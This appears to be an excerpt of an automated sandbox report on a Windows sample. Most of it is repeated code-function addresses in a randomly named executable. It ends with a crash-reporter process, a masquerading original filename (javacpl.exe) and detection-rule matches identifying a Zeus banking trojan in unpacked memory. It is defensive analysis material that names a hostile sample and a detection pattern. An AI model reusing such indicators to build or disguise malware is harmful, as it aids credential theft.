Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0171E4E0	6_2_0171E4E0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01707F60	6_2_01707F60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01726FE3	6_2_01726FE3
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_016E8FC0	6_2_016E8FC0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_016E3FB0	6_2_016E3FB0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0171AE00	6_2_0171AE00
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017136F0	6_2_017136F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017156D0	6_2_017156D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0171C6C0	6_2_0171C6C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03126B60	7_2_03126B60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03102BB0	7_2_03102BB0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03107BC0	7_2_03107BC0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03139A00	7_2_03139A00
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0313F240	7_2_0313F240
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_031342D0	7_2_031342D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0313B2C0	7_2_0313B2C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_031322F0	7_2_031322F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_031079A0	7_2_031079A0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_031461E3	7_2_031461E3
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_031340F0	7_2_031340F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0313D0E0	7_2_0313D0E0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03137F40	7_2_03137F40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03141F60	7_2_03141F60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03133790	7_2_03133790
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0311BF80	7_2_0311BF80
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0313D7B0	7_2_0313D7B0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03107650	7_2_03107650
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0313BE50	7_2_0313BE50
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0313A660	7_2_0313A660
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0313DE80	7_2_0313DE80
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03138D90	7_2_03138D90
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0312D580	7_2_0312D580
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FDF280	7_2_02FDF280
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FDBA60	7_2_02FDBA60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FA8A50	7_2_02FA8A50
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FDD250	7_2_02FDD250
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FDEBB0	7_2_02FDEBB0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FD4B90	7_2_02FD4B90
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FBD380	7_2_02FBD380
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FE3360	7_2_02FE3360
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FD9340	7_2_02FD9340
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FE099D	7_2_02FE099D
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FDA190	7_2_02FDA190
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FCE980	7_2_02FCE980
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FD36F0	7_2_02FD36F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FD56D0	7_2_02FD56D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FDC6C0	7_2_02FDC6C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FDAE00	7_2_02FDAE00
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FE6FE3	7_2_02FE6FE3
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FA8FC0	7_2_02FA8FC0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FA3FB0	7_2_02FA3FB0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FC7F60	7_2_02FC7F60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FD54F0	7_2_02FD54F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FDE4E0	7_2_02FDE4E0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FA8DA0	7_2_02FA8DA0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_015661E3	10_2_015661E3
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_015279A0	10_2_015279A0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_015540F0	10_2_015540F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0155D0E0	10_2_0155D0E0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01546B60	10_2_01546B60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01527BC0	10_2_01527BC0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01522BB0	10_2_01522BB0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0155F240	10_2_0155F240
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01559A00	10_2_01559A00
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_015542D0	10_2_015542D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0155B2C0	10_2_0155B2C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_015522F0	10_2_015522F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01558D90	10_2_01558D90
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0154D580	10_2_0154D580
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01557F40	10_2_01557F40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01561F60	10_2_01561F60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01553790	10_2_01553790
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0153BF80	10_2_0153BF80
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0155D7B0	10_2_0155D7B0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01527650	10_2_01527650
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0155BE50	10_2_0155BE50
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0155A660	10_2_0155A660
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0155DE80	10_2_0155DE80
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0150099D	10_2_0150099D
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014EE980	10_2_014EE980
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014FA190	10_2_014FA190
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014F9340	10_2_014F9340
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01503360	10_2_01503360
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014DD380	10_2_014DD380
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014F4B90	10_2_014F4B90
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014FEBB0	10_2_014FEBB0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014C8A50	10_2_014C8A50
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014FD250	10_2_014FD250
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014FBA60	10_2_014FBA60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014FF280	10_2_014FF280
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014C8DA0	10_2_014C8DA0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014FE4E0	10_2_014FE4E0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014F54F0	10_2_014F54F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014E7F60	10_2_014E7F60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014C8FC0	10_2_014C8FC0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01506FE3	10_2_01506FE3
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014C3FB0	10_2_014C3FB0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014FAE00	10_2_014FAE00
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014FC6C0	10_2_014FC6C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014F56D0	10_2_014F56D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014F36F0	10_2_014F36F0

Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 704

Source: Bpfz752pYZ.exe

Binary or memory string: OriginalFilenamejavacpl.exeX vs Bpfz752pYZ.exe

Source: Bpfz752pYZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.3.svchost.exe.2d30000.45.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.ed00000.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.62.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
